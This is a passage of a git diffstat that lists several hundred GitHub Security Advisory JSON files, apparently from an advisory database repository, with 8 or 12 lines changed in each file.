.../05/GHSA-8jhg-mc33-hhc5/GHSA-8jhg-mc33-hhc5.json | 12 +++--------- .../05/GHSA-8mf3-mg88-jjf7/GHSA-8mf3-mg88-jjf7.json | 12 +++--------- .../05/GHSA-8q9c-q4vf-f8rj/GHSA-8q9c-q4vf-f8rj.json | 12 +++--------- .../05/GHSA-8qp8-cphr-rp5h/GHSA-8qp8-cphr-rp5h.json | 12 +++--------- .../05/GHSA-8qrr-wcp7-x4jq/GHSA-8qrr-wcp7-x4jq.json | 8 ++------ .../05/GHSA-8qv7-h8f9-66xr/GHSA-8qv7-h8f9-66xr.json | 8 ++------ .../05/GHSA-8qxh-5rrf-mrg7/GHSA-8qxh-5rrf-mrg7.json | 12 +++--------- .../05/GHSA-8rw3-9ghr-xp9p/GHSA-8rw3-9ghr-xp9p.json | 8 ++------ .../05/GHSA-8v22-r255-jc2m/GHSA-8v22-r255-jc2m.json | 8 ++------ .../05/GHSA-8v3w-hxrw-97f7/GHSA-8v3w-hxrw-97f7.json | 12 +++--------- .../05/GHSA-8v9j-x5gc-mg8x/GHSA-8v9j-x5gc-mg8x.json | 12 +++--------- .../05/GHSA-8wg2-73cr-jv3q/GHSA-8wg2-73cr-jv3q.json | 8 ++------ .../05/GHSA-8xcw-9xw7-485h/GHSA-8xcw-9xw7-485h.json | 8 ++------ .../05/GHSA-8xxq-466x-jmgf/GHSA-8xxq-466x-jmgf.json | 12 +++--------- .../05/GHSA-92r4-wxv7-q9rx/GHSA-92r4-wxv7-q9rx.json | 8 ++------ .../05/GHSA-9324-v825-64hv/GHSA-9324-v825-64hv.json | 8 ++------ .../05/GHSA-933c-wxww-rpjp/GHSA-933c-wxww-rpjp.json | 8 ++------ .../05/GHSA-93cp-hj73-6xrq/GHSA-93cp-hj73-6xrq.json | 8 ++------ .../05/GHSA-945c-gxr5-cr85/GHSA-945c-gxr5-cr85.json | 8 ++------ .../05/GHSA-946x-98h5-x8xq/GHSA-946x-98h5-x8xq.json | 8 ++------ .../05/GHSA-94ph-jfqr-5g5h/GHSA-94ph-jfqr-5g5h.json | 8 ++------ .../05/GHSA-95xj-v76h-9x4x/GHSA-95xj-v76h-9x4x.json | 8 ++------ .../05/GHSA-9626-mp4x-mhfv/GHSA-9626-mp4x-mhfv.json | 8 ++------ .../05/GHSA-9668-gp9w-hwrf/GHSA-9668-gp9w-hwrf.json | 8 ++------ .../05/GHSA-96h6-vw4q-hj8c/GHSA-96h6-vw4q-hj8c.json | 8 ++------ .../05/GHSA-96x2-w96j-h2h7/GHSA-96x2-w96j-h2h7.json | 12 +++--------- .../05/GHSA-975g-jv28-79r2/GHSA-975g-jv28-79r2.json | 12 +++--------- .../05/GHSA-98vm-6j9m-69q6/GHSA-98vm-6j9m-69q6.json | 12 +++--------- .../05/GHSA-996c-q543-vq85/GHSA-996c-q543-vq85.json | 8 ++------ .../05/GHSA-996x-56fr-67x6/GHSA-996x-56fr-67x6.json | 8 ++------ .../05/GHSA-99cq-pmj3-v2hx/GHSA-99cq-pmj3-v2hx.json | 8 ++------ .../05/GHSA-99pv-r3jj-x8v5/GHSA-99pv-r3jj-x8v5.json | 8 ++------ .../05/GHSA-9c3c-25c4-7v5v/GHSA-9c3c-25c4-7v5v.json | 8 ++------ .../05/GHSA-9c59-3f2v-28rr/GHSA-9c59-3f2v-28rr.json | 12 +++--------- .../05/GHSA-9cj3-p33g-x9hg/GHSA-9cj3-p33g-x9hg.json | 8 ++------ .../05/GHSA-9cj5-qj56-q924/GHSA-9cj5-qj56-q924.json | 8 ++------ .../05/GHSA-9f2v-g758-7mf3/GHSA-9f2v-g758-7mf3.json | 8 ++------ .../05/GHSA-9f9q-j576-jp97/GHSA-9f9q-j576-jp97.json | 12 +++--------- .../05/GHSA-9fqx-cr7c-jcr7/GHSA-9fqx-cr7c-jcr7.json | 12 +++--------- .../05/GHSA-9gqf-v3vj-g5hp/GHSA-9gqf-v3vj-g5hp.json | 12 +++--------- .../05/GHSA-9hgh-cv8m-c8m5/GHSA-9hgh-cv8m-c8m5.json | 12 +++--------- .../05/GHSA-9hw9-f239-5h5h/GHSA-9hw9-f239-5h5h.json | 12 +++--------- .../05/GHSA-9j54-wmcm-g7mf/GHSA-9j54-wmcm-g7mf.json | 12 +++--------- .../05/GHSA-9m8c-wrpr-vm49/GHSA-9m8c-wrpr-vm49.json | 8 ++------ .../05/GHSA-9mf9-j4hx-8j6j/GHSA-9mf9-j4hx-8j6j.json | 12 +++--------- .../05/GHSA-9pqq-q9h6-282w/GHSA-9pqq-q9h6-282w.json | 12 +++--------- .../05/GHSA-9r92-jm28-mfmj/GHSA-9r92-jm28-mfmj.json | 8 ++------ .../05/GHSA-9rch-5m7j-5mjm/GHSA-9rch-5m7j-5mjm.json | 12 +++--------- .../05/GHSA-9rmc-rhrc-35vg/GHSA-9rmc-rhrc-35vg.json | 8 ++------ .../05/GHSA-9w8f-qg8v-8c68/GHSA-9w8f-qg8v-8c68.json | 8 ++------ .../05/GHSA-9wq5-j862-j69v/GHSA-9wq5-j862-j69v.json | 8 ++------ .../05/GHSA-9x78-4wr4-f2jj/GHSA-9x78-4wr4-f2jj.json | 12 +++--------- .../05/GHSA-9x8g-w8r7-7p9c/GHSA-9x8g-w8r7-7p9c.json | 8 ++------ .../05/GHSA-c2v8-h6rh-cf9h/GHSA-c2v8-h6rh-cf9h.json | 12 +++--------- .../05/GHSA-c2w8-wjm8-q9r4/GHSA-c2w8-wjm8-q9r4.json | 8 ++------ .../05/GHSA-c3cp-wmgh-g889/GHSA-c3cp-wmgh-g889.json | 8 ++------ .../05/GHSA-c3vm-p8x5-j8qp/GHSA-c3vm-p8x5-j8qp.json | 12 +++--------- .../05/GHSA-c3w7-4c4j-v6c9/GHSA-c3w7-4c4j-v6c9.json | 8 ++------ .../05/GHSA-c4fx-hc5m-2fq7/GHSA-c4fx-hc5m-2fq7.json | 12 +++--------- .../05/GHSA-c53q-p5wq-m9g6/GHSA-c53q-p5wq-m9g6.json | 12 +++--------- .../05/GHSA-c638-pq9h-7jf5/GHSA-c638-pq9h-7jf5.json | 8 ++------ .../05/GHSA-c6fp-j53m-qjjq/GHSA-c6fp-j53m-qjjq.json | 12 +++--------- .../05/GHSA-c83c-43x9-qm39/GHSA-c83c-43x9-qm39.json | 8 ++------ .../05/GHSA-c84h-w3jx-4m39/GHSA-c84h-w3jx-4m39.json | 8 ++------ .../05/GHSA-c88c-rr5r-3prm/GHSA-c88c-rr5r-3prm.json | 8 ++------ .../05/GHSA-c895-43rw-5x9c/GHSA-c895-43rw-5x9c.json | 8 ++------ .../05/GHSA-c8g7-4m44-qm2x/GHSA-c8g7-4m44-qm2x.json | 8 ++------ .../05/GHSA-c94m-78w3-8ggr/GHSA-c94m-78w3-8ggr.json | 8 ++------ .../05/GHSA-c9hc-hmvj-rv94/GHSA-c9hc-hmvj-rv94.json | 12 +++--------- .../05/GHSA-cccm-x8mq-7j9r/GHSA-cccm-x8mq-7j9r.json | 8 ++------ .../05/GHSA-ccf9-j4gr-f8jc/GHSA-ccf9-j4gr-f8jc.json | 8 ++------ .../05/GHSA-cf3q-fj9g-rpgj/GHSA-cf3q-fj9g-rpgj.json | 8 ++------ .../05/GHSA-cf6q-8992-3xv4/GHSA-cf6q-8992-3xv4.json | 12 +++--------- .../05/GHSA-cfhv-72p9-r3f9/GHSA-cfhv-72p9-r3f9.json | 8 ++------ .../05/GHSA-cg8w-5vgp-3c2r/GHSA-cg8w-5vgp-3c2r.json | 12 +++--------- .../05/GHSA-cgpm-fxg7-f9wc/GHSA-cgpm-fxg7-f9wc.json | 8 ++------ .../05/GHSA-cgw2-cwh6-c7wv/GHSA-cgw2-cwh6-c7wv.json | 12 +++--------- .../05/GHSA-chcm-cfp6-rx55/GHSA-chcm-cfp6-rx55.json | 8 ++------ .../05/GHSA-chr5-w9ff-5gcw/GHSA-chr5-w9ff-5gcw.json | 12 +++--------- .../05/GHSA-cm65-32vm-fcjq/GHSA-cm65-32vm-fcjq.json | 12 +++--------- .../05/GHSA-cmc3-76m8-f9wh/GHSA-cmc3-76m8-f9wh.json | 8 ++------ .../05/GHSA-cmxp-vp29-cqw4/GHSA-cmxp-vp29-cqw4.json | 12 +++--------- .../05/GHSA-cpqq-ch36-7c84/GHSA-cpqq-ch36-7c84.json | 12 +++--------- .../05/GHSA-cq9p-jcwj-qcvm/GHSA-cq9p-jcwj-qcvm.json | 8 ++------ .../05/GHSA-cqp4-gpw2-h4r2/GHSA-cqp4-gpw2-h4r2.json | 8 ++------ .../05/GHSA-crq9-rq4m-26gj/GHSA-crq9-rq4m-26gj.json | 8 ++------ .../05/GHSA-cv7h-2qqx-2rrp/GHSA-cv7h-2qqx-2rrp.json | 12 +++--------- .../05/GHSA-cw26-3hx5-52c9/GHSA-cw26-3hx5-52c9.json | 8 ++------ .../05/GHSA-cwjj-52x2-v74j/GHSA-cwjj-52x2-v74j.json | 12 +++--------- .../05/GHSA-cwq8-5gf7-6jfp/GHSA-cwq8-5gf7-6jfp.json | 8 ++------ .../05/GHSA-cwwf-gv4g-7qhw/GHSA-cwwf-gv4g-7qhw.json | 8 ++------ .../05/GHSA-cx5m-7r8x-4835/GHSA-cx5m-7r8x-4835.json | 8 ++------ .../05/GHSA-cxgx-c6gj-qh93/GHSA-cxgx-c6gj-qh93.json | 8 ++------ .../05/GHSA-f24x-wp94-r3f6/GHSA-f24x-wp94-r3f6.json | 8 ++------ .../05/GHSA-f2vh-2fr3-3pmx/GHSA-f2vh-2fr3-3pmx.json | 8 ++------ .../05/GHSA-f33x-wpq3-p8fh/GHSA-f33x-wpq3-p8fh.json | 8 ++------ .../05/GHSA-f36w-fhwh-qgp2/GHSA-f36w-fhwh-qgp2.json | 8 ++------ .../05/GHSA-f3gx-cg96-r5vh/GHSA-f3gx-cg96-r5vh.json | 8 ++------ .../05/GHSA-f3x3-49j2-r3jp/GHSA-f3x3-49j2-r3jp.json | 8 ++------ .../05/GHSA-f3xg-5g66-876x/GHSA-f3xg-5g66-876x.json | 8 ++------ .../05/GHSA-f4fc-rxg5-jwv5/GHSA-f4fc-rxg5-jwv5.json | 8 ++------ .../05/GHSA-f4j3-3p4m-g2gh/GHSA-f4j3-3p4m-g2gh.json | 8 ++------ .../05/GHSA-f4xq-x5xf-5rxv/GHSA-f4xq-x5xf-5rxv.json | 12 +++--------- .../05/GHSA-f54r-7cc6-9xfj/GHSA-f54r-7cc6-9xfj.json | 12 +++--------- .../05/GHSA-f562-34hv-qg95/GHSA-f562-34hv-qg95.json | 8 ++------ .../05/GHSA-f598-w9pf-6r29/GHSA-f598-w9pf-6r29.json | 12 +++--------- .../05/GHSA-f5p9-vc4w-mc6r/GHSA-f5p9-vc4w-mc6r.json | 12 +++--------- .../05/GHSA-f5pm-ggr8-6hjx/GHSA-f5pm-ggr8-6hjx.json | 12 +++--------- .../05/GHSA-f5rv-ph9h-95jp/GHSA-f5rv-ph9h-95jp.json | 8 ++------ .../05/GHSA-f6c3-6qwv-83gq/GHSA-f6c3-6qwv-83gq.json | 8 ++------ .../05/GHSA-f6pm-r74q-rw7g/GHSA-f6pm-r74q-rw7g.json | 12 +++--------- .../05/GHSA-f7f6-4j5g-969q/GHSA-f7f6-4j5g-969q.json | 12 +++--------- .../05/GHSA-f7r9-rqq9-pvpm/GHSA-f7r9-rqq9-pvpm.json | 12 +++--------- .../05/GHSA-f8f7-wvqm-7wj3/GHSA-f8f7-wvqm-7wj3.json | 8 ++------ .../05/GHSA-f936-v965-g74r/GHSA-f936-v965-g74r.json | 12 +++--------- .../05/GHSA-f9jx-2g6h-pw23/GHSA-f9jx-2g6h-pw23.json | 12 +++--------- .../05/GHSA-f9pm-2gc4-v2g5/GHSA-f9pm-2gc4-v2g5.json | 12 +++--------- .../05/GHSA-f9qw-7g88-jf6j/GHSA-f9qw-7g88-jf6j.json | 8 ++------ .../05/GHSA-fc26-c437-49h2/GHSA-fc26-c437-49h2.json | 8 ++------ .../05/GHSA-fcgq-p3x8-962w/GHSA-fcgq-p3x8-962w.json | 8 ++------ .../05/GHSA-ff8p-rgjc-8cmx/GHSA-ff8p-rgjc-8cmx.json | 8 ++------ .../05/GHSA-ffjv-cr82-26g3/GHSA-ffjv-cr82-26g3.json | 8 ++------ .../05/GHSA-ffp9-mjw3-xqfh/GHSA-ffp9-mjw3-xqfh.json | 12 +++--------- .../05/GHSA-fg4p-q327-mj7c/GHSA-fg4p-q327-mj7c.json | 8 ++------ .../05/GHSA-fg82-4jmc-96qq/GHSA-fg82-4jmc-96qq.json | 8 ++------ .../05/GHSA-fh7p-4pc7-4w39/GHSA-fh7p-4pc7-4w39.json | 8 ++------ .../05/GHSA-fh9c-mjc9-6gqq/GHSA-fh9c-mjc9-6gqq.json | 8 ++------ .../05/GHSA-fj42-c8v2-24mg/GHSA-fj42-c8v2-24mg.json | 12 +++--------- .../05/GHSA-fj4m-gh57-2vjv/GHSA-fj4m-gh57-2vjv.json | 8 ++------ .../05/GHSA-fm9x-22rp-jv6p/GHSA-fm9x-22rp-jv6p.json | 8 ++------ .../05/GHSA-fmw4-6c7m-vcmc/GHSA-fmw4-6c7m-vcmc.json | 8 ++------ .../05/GHSA-fp5w-43v8-pm5w/GHSA-fp5w-43v8-pm5w.json | 8 ++------ .../05/GHSA-fpfq-2jvw-r57h/GHSA-fpfq-2jvw-r57h.json | 8 ++------ .../05/GHSA-fpjr-8xmq-6c4g/GHSA-fpjr-8xmq-6c4g.json | 12 +++--------- .../05/GHSA-fpjv-7xrc-6c45/GHSA-fpjv-7xrc-6c45.json | 12 +++--------- .../05/GHSA-fq7r-m8m3-5v75/GHSA-fq7r-m8m3-5v75.json | 8 ++------ .../05/GHSA-fr74-c8w3-jj9x/GHSA-fr74-c8w3-jj9x.json | 8 ++------ .../05/GHSA-frh7-v9hr-974w/GHSA-frh7-v9hr-974w.json | 8 ++------ .../05/GHSA-frmw-wwv7-8q6q/GHSA-frmw-wwv7-8q6q.json | 8 ++------ .../05/GHSA-frv6-mjpx-v245/GHSA-frv6-mjpx-v245.json | 8 ++------ .../05/GHSA-fvmw-m7v4-pmmq/GHSA-fvmw-m7v4-pmmq.json | 8 ++------ .../05/GHSA-fvp2-vcfp-4p33/GHSA-fvp2-vcfp-4p33.json | 8 ++------ .../05/GHSA-fwg7-925x-49rf/GHSA-fwg7-925x-49rf.json | 12 +++--------- .../05/GHSA-fwwq-76h7-8wfr/GHSA-fwwq-76h7-8wfr.json | 12 +++--------- .../05/GHSA-g283-wj82-gpc9/GHSA-g283-wj82-gpc9.json | 12 +++--------- .../05/GHSA-g2rf-44r4-2pxc/GHSA-g2rf-44r4-2pxc.json | 8 ++------ .../05/GHSA-g3gx-5w5q-5654/GHSA-g3gx-5w5q-5654.json | 8 ++------ .../05/GHSA-g42v-6vx7-992j/GHSA-g42v-6vx7-992j.json | 8 ++------ .../05/GHSA-g4wh-mvqv-5fvh/GHSA-g4wh-mvqv-5fvh.json | 8 ++------ .../05/GHSA-g533-vrrr-6j8r/GHSA-g533-vrrr-6j8r.json | 12 +++--------- .../05/GHSA-g58g-3cj2-cwq2/GHSA-g58g-3cj2-cwq2.json | 8 ++------ .../05/GHSA-g5fm-9m5g-qh66/GHSA-g5fm-9m5g-qh66.json | 8 ++------ .../05/GHSA-g66j-xrpg-6cgc/GHSA-g66j-xrpg-6cgc.json | 12 +++--------- .../05/GHSA-g6c6-8h8v-2m9x/GHSA-g6c6-8h8v-2m9x.json | 12 +++--------- .../05/GHSA-g6rc-hwmp-x6w7/GHSA-g6rc-hwmp-x6w7.json | 12 +++--------- .../05/GHSA-g6vg-488v-2vgh/GHSA-g6vg-488v-2vgh.json | 8 ++------ .../05/GHSA-g8r5-vx2f-jmh2/GHSA-g8r5-vx2f-jmh2.json | 8 ++------ .../05/GHSA-g8w6-v52m-xmgv/GHSA-g8w6-v52m-xmgv.json | 12 +++--------- .../05/GHSA-g9hc-c85f-2p82/GHSA-g9hc-c85f-2p82.json | 12 +++--------- .../05/GHSA-gc7w-7m76-2gc2/GHSA-gc7w-7m76-2gc2.json | 8 ++------ .../05/GHSA-gcw7-gp3x-gx2j/GHSA-gcw7-gp3x-gx2j.json | 8 ++------ .../05/GHSA-gfcf-47fv-3q9j/GHSA-gfcf-47fv-3q9j.json | 12 +++--------- .../05/GHSA-gffp-3jpx-85xw/GHSA-gffp-3jpx-85xw.json | 8 ++------ .../05/GHSA-gg5p-5hw9-qmgj/GHSA-gg5p-5hw9-qmgj.json | 8 ++------ .../05/GHSA-gh98-frpq-mxgp/GHSA-gh98-frpq-mxgp.json | 8 ++------ .../05/GHSA-gj36-cq98-vqc6/GHSA-gj36-cq98-vqc6.json | 8 ++------ .../05/GHSA-gj5v-vm5q-cx98/GHSA-gj5v-vm5q-cx98.json | 8 ++------ .../05/GHSA-gjj3-5cjq-r87r/GHSA-gjj3-5cjq-r87r.json | 12 +++--------- .../05/GHSA-gqmh-7vv7-cv43/GHSA-gqmh-7vv7-cv43.json | 12 +++--------- .../05/GHSA-gqv4-jgmq-rfxp/GHSA-gqv4-jgmq-rfxp.json | 8 ++------ .../05/GHSA-gqxm-8c59-p8xh/GHSA-gqxm-8c59-p8xh.json | 8 ++------ .../05/GHSA-gr45-mrff-92w9/GHSA-gr45-mrff-92w9.json | 8 ++------ .../05/GHSA-grv9-4f8h-7vm2/GHSA-grv9-4f8h-7vm2.json | 8 ++------ .../05/GHSA-gv6g-j433-qjh3/GHSA-gv6g-j433-qjh3.json | 8 ++------ .../05/GHSA-gvj3-7p38-j75v/GHSA-gvj3-7p38-j75v.json | 8 ++------ .../05/GHSA-gw25-hcr4-7p5h/GHSA-gw25-hcr4-7p5h.json | 12 +++--------- .../05/GHSA-gxvh-83fg-whmm/GHSA-gxvh-83fg-whmm.json | 8 ++------ .../05/GHSA-h2v8-g64c-6cg2/GHSA-h2v8-g64c-6cg2.json | 8 ++------ .../05/GHSA-h377-8345-m527/GHSA-h377-8345-m527.json | 8 ++------ .../05/GHSA-h44f-xp3m-jxrx/GHSA-h44f-xp3m-jxrx.json | 8 ++------ .../05/GHSA-h469-86gw-qh7q/GHSA-h469-86gw-qh7q.json | 8 ++------ .../05/GHSA-h4pm-r4q8-84hf/GHSA-h4pm-r4q8-84hf.json | 12 +++--------- .../05/GHSA-h4qq-2j4v-765m/GHSA-h4qq-2j4v-765m.json | 8 ++------ .../05/GHSA-h5jh-rmm4-h55j/GHSA-h5jh-rmm4-h55j.json | 8 ++------ .../05/GHSA-h6fj-j4mh-7x7h/GHSA-h6fj-j4mh-7x7h.json | 8 ++------ .../05/GHSA-h72j-cvrp-x3v5/GHSA-h72j-cvrp-x3v5.json | 8 ++------ .../05/GHSA-h748-pv4x-h2jc/GHSA-h748-pv4x-h2jc.json | 8 ++------ .../05/GHSA-h74x-c3x7-3jxx/GHSA-h74x-c3x7-3jxx.json | 8 ++------ .../05/GHSA-h78c-f929-fmwg/GHSA-h78c-f929-fmwg.json | 8 ++------ .../05/GHSA-h7qj-m6r2-68cc/GHSA-h7qj-m6r2-68cc.json | 12 +++--------- .../05/GHSA-h856-rhx4-x88c/GHSA-h856-rhx4-x88c.json | 12 +++--------- .../05/GHSA-h93p-v9jf-r4xm/GHSA-h93p-v9jf-r4xm.json | 8 ++------ .../05/GHSA-hfw5-2294-7q36/GHSA-hfw5-2294-7q36.json | 8 ++------ .../05/GHSA-hgm2-x96p-g52q/GHSA-hgm2-x96p-g52q.json | 8 ++------ .../05/GHSA-hgmc-pjc5-rw9x/GHSA-hgmc-pjc5-rw9x.json | 12 +++--------- .../05/GHSA-hgmh-c94j-69fp/GHSA-hgmh-c94j-69fp.json | 8 ++------ .../05/GHSA-hj49-c58v-8jc2/GHSA-hj49-c58v-8jc2.json | 12 +++--------- .../05/GHSA-hjfm-g5wv-76g4/GHSA-hjfm-g5wv-76g4.json | 8 ++------ .../05/GHSA-hjvh-7gx8-qgjv/GHSA-hjvh-7gx8-qgjv.json | 12 +++--------- .../05/GHSA-hm7q-6fv8-j3p6/GHSA-hm7q-6fv8-j3p6.json | 8 ++------ .../05/GHSA-hq28-vq28-wfpf/GHSA-hq28-vq28-wfpf.json | 8 ++------ .../05/GHSA-hr4g-gcr7-8xp6/GHSA-hr4g-gcr7-8xp6.json | 12 +++--------- .../05/GHSA-hrhj-vx9r-6g9j/GHSA-hrhj-vx9r-6g9j.json | 8 ++------ .../05/GHSA-hrhq-658c-r72w/GHSA-hrhq-658c-r72w.json | 12 +++--------- .../05/GHSA-hv38-h7xw-2jmc/GHSA-hv38-h7xw-2jmc.json | 8 ++------ .../05/GHSA-hvjv-r7f5-rgrv/GHSA-hvjv-r7f5-rgrv.json | 8 ++------ .../05/GHSA-hvmv-7fff-rwxv/GHSA-hvmv-7fff-rwxv.json | 12 +++--------- .../05/GHSA-hw94-hjqx-fmc3/GHSA-hw94-hjqx-fmc3.json | 8 ++------ .../05/GHSA-hw9r-6w9j-rhxp/GHSA-hw9r-6w9j-rhxp.json | 12 +++--------- .../05/GHSA-j2q2-c799-v633/GHSA-j2q2-c799-v633.json | 8 ++------ .../05/GHSA-j2rg-f9wv-hrc6/GHSA-j2rg-f9wv-hrc6.json | 8 ++------ .../05/GHSA-j2vx-f3wv-m824/GHSA-j2vx-f3wv-m824.json | 8 ++------ .../05/GHSA-j2wx-cxw5-x6rh/GHSA-j2wx-cxw5-x6rh.json | 8 ++------ .../05/GHSA-j3rr-79qq-g9pm/GHSA-j3rr-79qq-g9pm.json | 8 ++------ .../05/GHSA-j4cx-8j85-q6qg/GHSA-j4cx-8j85-q6qg.json | 12 +++--------- .../05/GHSA-j4gm-x6g4-hpxh/GHSA-j4gm-x6g4-hpxh.json | 12 +++--------- .../05/GHSA-j566-76wv-3qrw/GHSA-j566-76wv-3qrw.json | 8 ++------ .../05/GHSA-j56q-2899-9w2x/GHSA-j56q-2899-9w2x.json | 8 ++------ .../05/GHSA-j677-22c6-m653/GHSA-j677-22c6-m653.json | 12 +++--------- .../05/GHSA-j67g-xx3g-mcgp/GHSA-j67g-xx3g-mcgp.json | 12 +++--------- .../05/GHSA-j6jw-jf8w-x7pq/GHSA-j6jw-jf8w-x7pq.json | 8 ++------ .../05/GHSA-j777-rfjc-qr5x/GHSA-j777-rfjc-qr5x.json | 8 ++------ .../05/GHSA-j797-qw8v-chcq/GHSA-j797-qw8v-chcq.json | 8 ++------ .../05/GHSA-j7q8-hh4q-9hpf/GHSA-j7q8-hh4q-9hpf.json | 8 ++------ .../05/GHSA-j7x4-p5fv-986c/GHSA-j7x4-p5fv-986c.json | 8 ++------ .../05/GHSA-j848-h89c-pqhf/GHSA-j848-h89c-pqhf.json | 12 +++--------- .../05/GHSA-j9r4-8gpw-9hh6/GHSA-j9r4-8gpw-9hh6.json | 8 ++------ .../05/GHSA-j9xm-57c9-67cv/GHSA-j9xm-57c9-67cv.json | 8 ++------ .../05/GHSA-jcg4-8f77-2hmc/GHSA-jcg4-8f77-2hmc.json | 12 +++--------- .../05/GHSA-jfgv-j6m5-6xrj/GHSA-jfgv-j6m5-6xrj.json | 12 +++--------- .../05/GHSA-jfhj-r2mw-3r6p/GHSA-jfhj-r2mw-3r6p.json | 8 ++------ .../05/GHSA-jfx2-hhh9-pcg2/GHSA-jfx2-hhh9-pcg2.json | 12 +++--------- .../05/GHSA-jgfv-fmg7-x4c2/GHSA-jgfv-fmg7-x4c2.json | 8 ++------ .../05/GHSA-jh3f-4cfw-pgf7/GHSA-jh3f-4cfw-pgf7.json | 12 +++--------- .../05/GHSA-jh92-gg4f-jqfw/GHSA-jh92-gg4f-jqfw.json | 8 ++------ .../05/GHSA-jjqc-5mxx-88h5/GHSA-jjqc-5mxx-88h5.json | 12 +++--------- .../05/GHSA-jm5c-rgfp-cjhx/GHSA-jm5c-rgfp-cjhx.json | 8 ++------ .../05/GHSA-jmg6-3prv-3x7q/GHSA-jmg6-3prv-3x7q.json | 12 +++--------- .../05/GHSA-jp2p-x75q-6xp5/GHSA-jp2p-x75q-6xp5.json | 12 +++--------- .../05/GHSA-jp4m-c57w-j86f/GHSA-jp4m-c57w-j86f.json | 8 ++------ .../05/GHSA-jp78-f6xg-rhj6/GHSA-jp78-f6xg-rhj6.json | 12 +++--------- .../05/GHSA-jp83-4w56-5w6x/GHSA-jp83-4w56-5w6x.json | 8 ++------ .../05/GHSA-jpfx-8w27-cwrp/GHSA-jpfx-8w27-cwrp.json | 12 +++--------- .../05/GHSA-jpvf-8hj8-56qq/GHSA-jpvf-8hj8-56qq.json | 12 +++--------- .../05/GHSA-jq4q-7v6p-hvjv/GHSA-jq4q-7v6p-hvjv.json | 12 +++--------- .../05/GHSA-jqh5-w95m-3mpg/GHSA-jqh5-w95m-3mpg.json | 8 ++------ .../05/GHSA-jr82-5fpr-xf2h/GHSA-jr82-5fpr-xf2h.json | 8 ++------ .../05/GHSA-jrg6-fc48-2465/GHSA-jrg6-fc48-2465.json | 8 ++------ .../05/GHSA-jrwq-x7vh-89x6/GHSA-jrwq-x7vh-89x6.json | 8 ++------ .../05/GHSA-jrx8-2cjx-g9mh/GHSA-jrx8-2cjx-g9mh.json | 12 +++--------- .../05/GHSA-jvp4-r2cv-v2cw/GHSA-jvp4-r2cv-v2cw.json | 8 ++------ .../05/GHSA-jvw2-9vxw-fhqh/GHSA-jvw2-9vxw-fhqh.json | 12 +++--------- .../05/GHSA-jwmf-6p4j-pp9v/GHSA-jwmf-6p4j-pp9v.json | 12 +++--------- .../05/GHSA-jx63-73f5-2r54/GHSA-jx63-73f5-2r54.json | 12 +++--------- .../05/GHSA-jxff-rx6r-r788/GHSA-jxff-rx6r-r788.json | 12 +++--------- .../05/GHSA-jxrm-34gh-67p6/GHSA-jxrm-34gh-67p6.json | 12 +++--------- .../05/GHSA-jxx8-r7x5-x5m5/GHSA-jxx8-r7x5-x5m5.json | 12 +++--------- .../05/GHSA-m26p-926q-cmv4/GHSA-m26p-926q-cmv4.json | 8 ++------ .../05/GHSA-m357-g5r5-9xrx/GHSA-m357-g5r5-9xrx.json | 12 +++--------- .../05/GHSA-m494-qq5r-q4v8/GHSA-m494-qq5r-q4v8.json | 12 +++--------- .../05/GHSA-m49q-m8jc-f334/GHSA-m49q-m8jc-f334.json | 12 +++--------- .../05/GHSA-m4p3-r3rv-7rrm/GHSA-m4p3-r3rv-7rrm.json | 12 +++--------- .../05/GHSA-m52h-228p-7rxq/GHSA-m52h-228p-7rxq.json | 8 ++------ .../05/GHSA-m596-76xf-p5r5/GHSA-m596-76xf-p5r5.json | 8 ++------ .../05/GHSA-m6hh-qxwf-f2wj/GHSA-m6hh-qxwf-f2wj.json | 8 ++------ .../05/GHSA-m6m8-g76c-567c/GHSA-m6m8-g76c-567c.json | 8 ++------ .../05/GHSA-m74p-gqj9-cr9v/GHSA-m74p-gqj9-cr9v.json | 12 +++--------- .../05/GHSA-m8cf-9xr4-gv54/GHSA-m8cf-9xr4-gv54.json | 8 ++------ .../05/GHSA-m94w-hxf8-49vf/GHSA-m94w-hxf8-49vf.json | 8 ++------ .../05/GHSA-m987-7xw4-4r9w/GHSA-m987-7xw4-4r9w.json | 8 ++------ .../05/GHSA-m9gv-4c6g-8f49/GHSA-m9gv-4c6g-8f49.json | 8 ++------ .../05/GHSA-m9q5-9cgj-xcgc/GHSA-m9q5-9cgj-xcgc.json | 8 ++------ .../05/GHSA-m9wp-hhqp-ww9j/GHSA-m9wp-hhqp-ww9j.json | 8 ++------ .../05/GHSA-mc56-whq4-j9vh/GHSA-mc56-whq4-j9vh.json | 8 ++------ .../05/GHSA-mcjm-4hv3-7875/GHSA-mcjm-4hv3-7875.json | 8 ++------ .../05/GHSA-mf82-5624-x958/GHSA-mf82-5624-x958.json | 12 +++--------- .../05/GHSA-mfq9-x3jf-g35m/GHSA-mfq9-x3jf-g35m.json | 8 ++------ .../05/GHSA-mh6c-cqhm-4rxx/GHSA-mh6c-cqhm-4rxx.json | 8 ++------ .../05/GHSA-mhh9-p6qv-qq6h/GHSA-mhh9-p6qv-qq6h.json | 12 +++--------- .../05/GHSA-mhvm-wr2g-3xfq/GHSA-mhvm-wr2g-3xfq.json | 12 +++--------- .../05/GHSA-mhxc-qp4v-2gf3/GHSA-mhxc-qp4v-2gf3.json | 8 ++------ .../05/GHSA-mjmj-78h5-2728/GHSA-mjmj-78h5-2728.json | 12 +++--------- .../05/GHSA-mm8c-8p6q-jgq6/GHSA-mm8c-8p6q-jgq6.json | 12 +++--------- .../05/GHSA-mmg5-p8mc-485h/GHSA-mmg5-p8mc-485h.json | 8 ++------ .../05/GHSA-mpp4-w5xw-8xhc/GHSA-mpp4-w5xw-8xhc.json | 12 +++--------- .../05/GHSA-mq7j-cf25-xgvv/GHSA-mq7j-cf25-xgvv.json | 8 ++------ .../05/GHSA-mqjr-4xvc-hm4g/GHSA-mqjr-4xvc-hm4g.json | 8 ++------ .../05/GHSA-mqr5-ffq5-hrp4/GHSA-mqr5-ffq5-hrp4.json | 8 ++------ .../05/GHSA-mv4c-6fpc-r32q/GHSA-mv4c-6fpc-r32q.json | 8 ++------ .../05/GHSA-mvf6-4p6h-52hv/GHSA-mvf6-4p6h-52hv.json | 12 +++--------- .../05/GHSA-mw8x-7c7c-76qf/GHSA-mw8x-7c7c-76qf.json | 12 +++--------- .../05/GHSA-mwg8-2j37-h8hh/GHSA-mwg8-2j37-h8hh.json | 12 +++--------- .../05/GHSA-mxx5-2h9x-347v/GHSA-mxx5-2h9x-347v.json | 8 ++------ .../05/GHSA-p6qx-67x2-357p/GHSA-p6qx-67x2-357p.json | 8 ++------ .../05/GHSA-p73h-2mgq-7mwp/GHSA-p73h-2mgq-7mwp.json | 8 ++------ 